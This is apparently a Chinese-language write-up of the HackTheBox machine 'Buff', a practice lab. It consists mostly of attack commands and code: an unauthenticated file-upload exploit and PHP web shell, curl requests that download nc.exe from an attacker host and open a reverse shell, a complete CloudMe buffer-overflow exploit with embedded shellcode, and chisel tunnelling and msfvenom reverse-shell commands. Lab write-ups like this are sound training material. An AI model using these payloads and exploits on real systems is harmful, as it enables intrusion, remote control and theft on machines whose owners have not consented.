0%

HackTheBox-Buff

OSCP like

20210407-22:28:54-_vBnv5P_jVJSmf

搜索这个Gym管理软件。未授权验证上传任意文件漏洞

1
python3 exploit.py -t buff.htb:8080 -f i.php

20210407-22:30:40-_9bJdwJ_lb8mkv

上传以下代码的php

1
<?php echo(system($_GET[a]))?>

20210408-00:10:18-_pQPwf2_XtM0By

下载nc.exe到目标机器,并反弹shell。(目标系统有防病毒软件。。所以上传一些文件上去会直接被杀掉。)

1
2
3
curl 'http://10.129.2.18:8080/system_shell.php?a=powershell%20-c%20%22Invoke-WebRequest%20-Uri%20%27http://yourip/nc.exe%27%20-OutFile%20%27C:\Users\Public\Downloads\nc.exe%27%22'

curl 'http://10.129.2.18:8080/system_shell.php?a=C:\Users\Public\Downloads\nc.exe%20yourip%20%201232%20-e%20cmd'

20210408-00:15:06-_STgAdv_iSbahY

经过信息收集,发现系统上还有个不对外开放的8888端口。

1
netstat -an

20210408-00:17:02-_IMx0e6_AN1Ig2

shaun用户的Downloads目录下有CloudMe。搜索这个应用能发现一个bof的exp。
20210408-00:24:42-_Ojq1is_wvzRaa
20210408-00:19:51-_gpi94z_ABQ2mA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)%

同样也是8888端口,利用端口转发将8888转发出来。

1
./chisel_1.7.6_darwin_amd64 server -p 1233 --reverse
1
./chisel.exe client your-ip:1233 R:socks

生成shellcode修改掉poc里的shellcode的。

1
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=1235 -f python -b '\x00\x0A\x0D'
1
proxychains4 python3 48389.py

20210408-00:23:37-_DRJpf1_eTHaRO